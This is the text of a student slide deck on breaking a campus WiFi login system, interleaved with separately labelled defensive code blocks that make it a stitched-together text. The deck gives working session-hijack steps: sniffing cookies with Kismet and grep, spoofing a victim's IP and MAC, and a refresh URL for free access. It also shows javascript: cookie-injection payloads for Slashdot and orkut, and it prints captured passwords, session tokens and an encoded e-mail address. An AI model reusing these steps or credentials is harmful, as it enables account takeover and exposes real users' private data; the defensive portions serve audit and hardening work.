Smit WiFi_2


Down the rabbit-hole

a sneak peek at the SMIT-WiFi implementation

Amit Saraff, Ashish Shekhar

Tools Used

• Nmap – network scanner
• Wireshark / Ethereal – packet analyzer
• Kismet – wireless sniffer
• BurpSuite – proxy (HTTP header modifier)
• Firefox – web browser
  – Live HTTP Headers
  – User Agent Switcher
  – Tamper Data
  – View Cookie CS
  – NoScript
• Unix tools – wget, curl, ssh, ifconfig etc.
• Intel Centrino-based laptop running Slackware 9

Brief Overview

• IP range: 172.16.183.0/22
• WEP / WPA – no (yes !!)
• 4 different ESSIDs:
  – SMITWiFi1
  – SMITWiFi2
  – SMITWiFi3
  – SMITWiFi4
  – different ESSIDs / same channel ??

Brief Overview (cont..)

• 172.16.183.1 – router / DNS resolver / authenticator

• 172.16.183.2 – 802.11b Access Point

• 172.16.183.3 – D-link DWL-900 AP+ (standard 802.11bg ap)

• 172.16.183.4 – (new) Another access-point ?

Initial Monitoring

• E-mail accounts

Initial Monitoring (cont..)

• and web addresses
  – www.orkut.com
  – www.cisco.com
  – www.wipro.com
  – www.musicgamesrefer.com
  – www.grisoft.com
  – www.yahoo.com
  – And some more orkut !!

But that's not what we are looking for !!

Wall of Sheep

IP              MAC                User   Password
172.16.183.15   00:12:f0:db:ef:6f  d205a  m_-_-i
172.16.183.23   00:12:f0:64:0a:67  g205a  b_-_i
172.16.183.78   00:13:ce:7b:d7:9b  d108a  1_3
172.16.183.116  00:16:ce:54:69:48  b206a  j_-n
172.16.183.117  00:12:f0:56:b7:3f  k205a  n_-_-_-w
172.16.183.149  00:15:00:22:c4:0f  l205a  p_-_-_-_4
172.16.183.155  00:13:02:43:2b:0d  r305a  r_-_-_a
172.16.183.180  00:12:f0:51:3b:e0  j301a  h_-_-_-a

** and this is just a small part of the list

How about some user account details?

So how did this happen ?

172.16.183.1 – Authentication Server

Talk about multi-platform support

User – Agent Switcher to the rescue

Background magic – how it really works

How hard is it?

• Log the network traffic using Kismet
• And run:
  strings Kismet*.dump | grep Cookie | egrep "_Pass=[a-zA-Z0-9]+;"
• to get:
  Cookie: _UserName=m301a; _Pass=123; JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293
  Cookie: _UserName=r703a; _Pass=manisha; JSESSIONID=2914445C961B072A73498FDCC1CEB9AE
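As an added, defender-side check (not part of the deck): the same kind of scan over `strings` output, written to audit rather than harvest. It classifies cookies that carry a password or a session identifier in clear text, redacts the values, and lists the hosts that must be fixed first. The sample lines are constructed.

```python
import re

# Constructed sample of what `strings` over a capture might emit, one HTTP
# header per line; hosts, usernames and secrets are made up for this example.
SAMPLE_LINES = [
    "Host: 172.16.183.1",
    "Cookie: _UserName=x101a; _Pass=hunter2; JSESSIONID=0123456789ABCDEF0123456789ABCDEF",
    "Host: www.example.com",
    "Cookie: theme=dark; lang=en",
    "Host: 172.16.183.1",
    "Cookie: _UserName=y202a; _Pass=letmein; JSESSIONID=FEDCBA9876543210FEDCBA9876543210",
]

# Cookie names that should never travel over clear-text HTTP, by severity.
PASSWORD_NAMES = re.compile(r"pass|pwd|secret", re.IGNORECASE)
SESSION_NAMES = re.compile(r"sess|sid|token|auth", re.IGNORECASE)

def redact(value):
    """Keep only the length, so the report does not re-expose the secret."""
    return "*" * len(value)

def audit_cookies(lines):
    """One finding per sensitive cookie seen in clear-text request headers:
    (host, cookie_name, severity, redacted_value), in capture order."""
    findings = []
    host = "?"
    for line in lines:
        field, _, rest = line.partition(":")
        if field.lower() == "host":
            host = rest.strip()
        elif field.lower() == "cookie":
            for pair in rest.split(";"):
                name, _, value = pair.strip().partition("=")
                if PASSWORD_NAMES.search(name):
                    findings.append((host, name, "password", redact(value)))
                elif SESSION_NAMES.search(name):
                    findings.append((host, name, "session-id", redact(value)))
    return findings

def hosts_leaking_passwords(findings):
    """Hosts whose clients send a password cookie in the clear: fix these first
    (serve the login over TLS, and stop putting the password in the cookie)."""
    return sorted({host for host, _, severity, _ in findings if severity == "password"})

if __name__ == "__main__":
    found = audit_cookies(SAMPLE_LINES)
    for finding in found:
        print(finding)
    print("password-leaking hosts:", hosts_leaking_passwords(found))
```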

But that isn't very ethical

• Problem – How to get access to the internet without compromising another's account ?

• Solution – Study the entire process and find a work-around.

Brief Introduction to Cookies

No not these “cookies”

So what are they ?

• Parcels of text sent by a server to a web-browser and then sent unchanged back by the browser each time it accesses the server.

• Used for authenticating, tracking and maintaining specific information about users.

• We saw an example 2-3 slides back.
  – For those who “missed it”, here it is again:
    Cookie: _UserName=m301a; _Pass=123; JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293

How do they help?

• The SMIT server sets a cookie on each client it authenticates.

• Refreshes it every 180 seconds.
• How do I then get this cookie?
• And how will it help even if I do manage to capture it?

Step 1

Find active hosts on the network: enter 'Kismet'.

Step 1 (cont..)

Step 2

Select an active host and note its parameters, i.e. IP address and MAC address.

Step 2 (cont..)

Change settings locally to match the host about to be compromised.

For example:
ifconfig eth1 172.16.183.209 hw ether 00:13:02:C1:28:D4
route add default gw 172.16.183.1

Step 3

• Fire up your browser – Firefox in our case.

• Type in the following URL :

http://172.16.183.1/24online/webpages/clientlogin.jsp?loginstatus=true&logoutstatus=null&message=&liverequesttime=180&livemessage=null&url=&isAccessDenied=null&fromlogout=null

• This acts as a 'refresh' command to the server which replies back with the validated cookie.

..to get

..and we are online

Step 3 (cont..)

• What this does:
  – Sets you up with the “cookie”
  – Refreshes itself every 180 seconds
  – Voila, you have free internet access (until the guy logs off / you log him off)
• Node goes offline?
  – Rinse and repeat the entire process with another IP.
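Added example, not from the deck or from the 24online product: a model of the authenticator as the slides describe it (clear-text `_UserName`/`_Pass` cookie, table of active IP/MAC pairs, 180-second refresh) beside a hardened design with a server-side, rotating bearer token. Class and function names are the example's own; the Secure flag assumes the login page is served over TLS.

```python
import os

class WeakAuthenticator:
    """The deck's scheme: a table of active IP/MAC pairs, and a cookie carrying
    username and password that the browser re-sends every 180 seconds. Every
    input it checks can be sniffed or spoofed from the same wireless segment."""
    def __init__(self):
        self.active = {}  # (ip, mac) -> username

    def login(self, ip, mac, user, password):
        self.active[(ip, mac)] = user
        return f"_UserName={user}; _Pass={password}"  # password in clear text

    def refresh(self, ip, mac, cookie):
        # A spoofed IP/MAC plus a replayed cookie looks exactly like the owner.
        pairs = dict(p.strip().split("=", 1) for p in cookie.split(";"))
        return self.active.get((ip, mac)) == pairs.get("_UserName")

class HardenedAuthenticator:
    """Random bearer token kept only server-side, sent in a Secure + HttpOnly
    cookie, rotated on every refresh and expiring after one refresh window.
    The password never enters the cookie."""
    def __init__(self, ttl=180):
        self.ttl = ttl
        self.sessions = {}  # token -> (user, expires_at)

    def _issue(self, user, now):
        token = os.urandom(16).hex()
        self.sessions[token] = (user, now + self.ttl)
        return token

    def login(self, user, now):
        # Assumed: the password was verified before this is called.
        token = self._issue(user, now)
        return f"session={token}; Secure; HttpOnly; SameSite=Strict; Max-Age={self.ttl}"

    def refresh(self, token, now):
        # Consume the presented token and hand out a fresh one, or None.
        # A captured copy dies at the owner's next refresh or at expiry.
        entry = self.sessions.pop(token, None)
        if entry is None or now > entry[1]:
            return None
        return self._issue(entry[0], now)

    def logout(self, token):
        self.sessions.pop(token, None)

def token_from_cookie(set_cookie):
    return set_cookie.split(";", 1)[0].partition("=")[2]
```

The weak model accepts any client that presents the owner's IP/MAC and a replayed cookie; in the hardened model the cookie holds no password, is never sent over plain HTTP, and a copied token stops working at the owner's next refresh, at expiry, or at logout.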

Return to cookie-land

• Authentication mechanisms
  – We just saw an abuse of the implicit trust mechanism guaranteed by cookies
  – But that was local
  – Can it be extended to other sites too?

Presenting Slashdot

• Popular technology portal.
• News site for anything regarding Technology / Linux / Politics / Science / YRO – Your Rights Online and more.
• Uses the HTTP POST mechanism for sending authentication data.

The main page

Login page

Cookie

Exploit -

• To authenticate as that user, simply capture the incoming cookie.
• Then in the address bar type in:
  javascript:document.cookie='user=609178::Ik2zsyezqK6AIER7rLuyD7; Domain=.slashdot.org; Path=/';

Result ?

So what ?

But then that is hardly any sweat !!

Moving on - orkut.com

• What is orkut?
  – Social networking site.
  – Online community to meet new people and keep in touch with old ones.
  – Now part of the Google empire.
  – On in “at least” 15 of the 20 or so computers in the campus cyber-cafe at any time of the day.

Main page.

First observations.

• Note – The address bar is yellow and there is a lock sign on the taskbar.
  – What it means:
    • Site uses secure HTTP (port 443 / https)
    • Certificate for validation (AES-256 bit encryption)
    • Trusted certificate issuer – Thawte Consulting cc.
  – Actual login frame URL:
    https://www.google.com/accounts/ServiceLoginBox?service=orkut&nui=2&uilel=1&skipvpage=true&msg%3D0%26page%3Dhttp%253A%252F%252Fwww.orkut.com%252F&followup=https%3A%2F%2Fwww.orkut.com%2FGLogin.aspx&hl=en-US

In other words – that information is definitely not being cracked anytime soon.

Cookies, again?

• Cookie generated on login :

Cookies, again ? (cont..)

• 2 cookies set by the orkut domain
  – First one seems to be a user preference cookie
  – Second one is for timezone (??)

Cookie (1)

• Question : Does Cookie 1 alone do the trick then ?

• Solution : Grab another cookie and check.

Back to kismet dumps

• Hunt for a cookie in the previous gathered logs.

strings Kismet-*dump | grep Cookie | grep -i orkut

• To get:
  Cookie: orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:

Set this cookie

javascript:document.cookie='orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:; Domain=.orkut.com; Path=/';
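An added cookie-review routine, not from the deck, covering both the Slashdot and orkut cookies above: it parses a Set-Cookie header, reports a missing Secure attribute (the cookie then travels over clear-text HTTP, where it was captured) and a missing HttpOnly attribute (script, including a javascript: URL, may read or overwrite it), and decodes the ORKUTPREF fields to show which identity data any holder of the cookie can read back. The header is constructed with a made-up address, not the real one.

```python
import base64

# Constructed Set-Cookie header in the ORKUTPREF layout shown above; the identity
# fields hold base64 of a made-up address and S is made-up binary, not real data.
FAKE_ID = base64.b64encode(b"someone@example.com").decode()
FAKE_SIG = base64.b64encode(bytes(range(20))).decode()
SAMPLE_SET_COOKIE = (
    "orkut_state=ORKUTPREF=ID=1234567890:INF=0:LNG=1:CNT=9:USR=" + FAKE_ID
    + ":PHS=:TS=1158132779:LCL=en-US:PE=" + FAKE_ID + ":GTI=0:GID=:S=" + FAKE_SIG
    + ":; Domain=.orkut.com; Path=/"
)

def parse_set_cookie(header):
    """Split a Set-Cookie header into (name, value, {attribute: value})."""
    first, *attrs = [p.strip() for p in header.split(";")]
    name, _, value = first.partition("=")
    flags = {}
    for attr in attrs:
        if attr:
            k, _, v = attr.partition("=")
            flags[k.lower()] = v or True
    return name, value, flags

def parse_orkutpref(value):
    """'ORKUTPREF=ID=..:INF=..:...' -> {'ID': '..', ...}; base64 never holds ':'."""
    fields = {}
    for item in value.partition("=")[2].split(":"):
        k, _, v = item.partition("=")
        if k:
            fields[k] = v
    return fields

def decode_if_text(v):
    """The decoded string when v is base64 of printable ASCII, else None."""
    try:
        text = base64.b64decode(v, validate=True).decode("ascii")
    except ValueError:  # bad alphabet, bad padding, or non-ASCII bytes
        return None
    return text if text.isprintable() else None

def audit(header):
    """Reviewer findings: missing Secure/HttpOnly, and identity readable by any holder."""
    name, value, flags = parse_set_cookie(header)
    findings = [f"{name}: missing {f}" for f in ("secure", "httponly") if f not in flags]
    for k, v in parse_orkutpref(value).items():
        text = decode_if_text(v)
        if text and "@" in text:
            findings.append(f"{name}: field {k} is a base64-encoded e-mail address")
    return findings
```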

To get :

Notice self-post!

Future possibilities ?

• Set up an HTTP server and masquerade as 172.16.183.1 in order to capture logins.

• Attack the hardware itself (vulnerabilities in the server / access points).

• Ban certain clients from access (ARP flooding).

• Put the laptop in “Master” mode to route traffic through it.

Thank you

Questions ?